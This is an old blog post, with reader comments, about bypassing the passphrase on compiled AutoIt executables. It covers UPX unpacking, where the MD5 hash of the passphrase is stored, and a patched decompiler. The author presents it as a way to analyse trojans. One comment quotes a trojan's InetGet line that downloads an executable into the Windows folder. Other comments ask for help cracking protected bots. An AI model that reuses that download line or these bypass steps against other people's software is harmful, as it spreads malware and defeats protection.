Yet Another Update for AutoIT cracking

13 09 2006

UPDATE: New link for the file below:

I’ve been hopelessly trying to figure out how to bypass the pass-phrase for AutoIT v. One of our readers Daniel kindly posted a link to ANITWPA (, where they already did this. I downloaded the “improved” decompiler and it worked great. Here’s link to one of their mirrors (I couldn’t get to the original site):

Basically, they bypass the passphrase altogether. I managed to get to the point in OllyDbg (great tool, BTW, I’ll post some OllyDbg things I recently learned soon) where I found out that:

  • The passphrase used for “encrypting” is stored in the file as an MD5 hash.
  • The resulting .exe file is UPXed.
  • To find the MD5, first use the upx.exe provided by autoit (\autoit-v3.2.0.1\Aut2Exe\upx.exe) to decompress the .exe:
    • Open a command prompt and use upx.exe with the “-d” switch:
    • EXAMPLE: upx -d mytestfile.exe
    • More about UPX can be found here:
  • This will decompress “mytestfile.exe” – it almost doubles in size.
  • The MD5 hash of the passphrase is found at offset 0x0005d618 in the decompressed file (you can use hiew or any binary file viewer – even OllyDbg!).
  • When you run the exe2aut to “decrypt” the file, it will take the passphrase you enter and convert it to MD5. There is also some XORing going on. This is where I’m weak right now.
  • At some point, it will open the EXE and do…something. This is where I was stuck.

I’ll examine the AutoIt3-Decompiler from CW2K to see if I can learn anything from them. If anyone has info on how they did it, please post a comment. From what I can see, it seems like they just “patched” the original AutoIT decompiler, probably to skip the whole checking of passphrases or fill in the MD5 passphrase from the one in the file.

Why am I doing this? Why do I care? Two reasons:

  1. To emphasise that people should NOT store passwords or sensitive information in their AutoIT scripts.
  2. To quote from the readme file in the “improved” decompiler above:

Often AutoIt3 is misused by Trojan writers to install their crap on your PC so the decompiler may bring some light in the dark.





27 responses

15 09 2006

“Often AutoIt3 is misused by Trojan writers to install their crap on your PC so the decompiler may bring some light in the dark.“

That’s right. Lots of these so-called AutoIt trojans are being spreading among our community. Using the above tool, I had the ability to decompile them all to see how they affected my system.

Thanks very much for your great posts. Keep up your good work!

3 10 2006

The zip file is not on that url, can you please upload it somewhere?

15 10 2006

Nowadays autoitscripts can be obfuscated. So even if you can decompile, you will not be able to read the code you just decompiled.

30 12 2006

this site may help you then…

2 04 2007

Here is a working mirror for the “Improved” version:


29 05 2007

it doesnt seem to work for me anymore on newly made scripts -.-‘

27 06 2007

Has anyone shed any new light on this subject, I have an autoit that I have been trying to get the original script from the current exe file. I have tried the tutorial at OpenRCE and it does not seem to work.


18 07 2007

I completely Reverse Engineered the office AutoIt3 Decompiler and made it
Open source. See


* can also decompile ‘Auto Hot Key Scripts’ (AHK – is some spin off project from Autoit it)
Also I added ‘support’ for some common Obfuscator like ‘van Zande’ (the one from the autoit download page) and Encode it.

For historical reason and for ppl from the east (China, Japan… ) how have DBCS (Double Binary Char Set) enable on they windows myAutToExe currently don’t come alon with there is also the ‘Exe2Aut-CW2K-Edition2.exe’ which now also supports unicode scripts.

->AutoIt 3-Decompiler CW2K-Edition2 + Improved

Relate Forum Link

1 08 2007

Has anyone has autoIt 3-Decompiler CW2K-Edition2 + Improved The site is die and i cannot download

9 08 2007

another mirror site ?
best regards

7 09 2007
suspicious script user

AutoIt and higher compiles to bytecode. Makes checking scripts for backdoors harder… 😦
Will anyone care to write a decompiler?

12 10 2007

thanks for the info guys, i got a autoit progarm that i realy needed but it had a trojan, with the decompiler i got on one of the urls i could remove the trojan form the script and rebuilt it =D

look what was in the script
InetGet(“http://www.xxxxxxx/hosts.exe”, “C:\WINDOWS\hosts.exe”,1)

i removed that and rebult the script and now im happy =D
thanks again

11 12 2007
piyush chandra

thank u for the great information.
i have one AutoIt Decompile (along with some latest version of AtoIt3, i d’loaded)
Just got interested in AutoIt after i decompiled a nasty Trojan.. 🙂

The links that u have mentioned here are no longer available, i need some decompiler that “bypass the passphrase”… plz help me.
got to decompile a few more Trojans.. 😉

27 03 2009

Hey If you guys came through any AutoIT written viruses split them into a lot of pieses(use a simple spitter) zip all the files and mail it to me at i thnk i will then try my best to programe a cure to those viruses and mail it to who ever you are.Try me may be youl find a help.Dnt wory im not a spammer.i jst wont ot help!!!

27 03 2009

Bt remember it will take a little bit of time 🙂

23 05 2009


29 07 2009

I got this bot that has a password on it – does anyone have a current way to break the encryption and decompile an exe?

All the old links are dead.. Please help 🙂

13 10 2010

ростов объявления о знакомстве тула форум знакомств сайт знакомств г кызыл секс знакомства г ногинска знакомства бисексуалы сосновый бор секс знакомства знакомства лав усинск
bestr of dati

3 12 2011

Hi there! Do you know if they make any plugins to help with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good gains. If you know of any please share. Thanks!

5 09 2012

hi………how can I debug an autoit file using Olly debug?……

18 03 2013
privatkredite füR selbstständige

Cool blog! Is your theme custom made or did you download it from somewhere?
A theme like yours with a few simple tweeks would really make my blog shine.
Please let me know where you got your theme.
Thanks a lot

6 05 2013
how to get a Loan with bad credit

There’s certainly a great deal to find out about this issue. I really like all of the points you made.

11 05 2013
what is clickbank marketplace

I’ve been attending around for the optimal website to acquire one particular.:)

22 05 2013
wechsel von gesetzliche in private krankenversicherung

I normally usually do not respond to messages, but on this matter.

30 11 2013
ミネトンカ ローファー

カシオ カタログ ミネトンカ ローファー

14 12 2017
Google Resource

I’m trampled by your contents carry on the wonderful work.

1 01 2018
Wordpress homepage

I feel happiness to read the content that you are posting.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: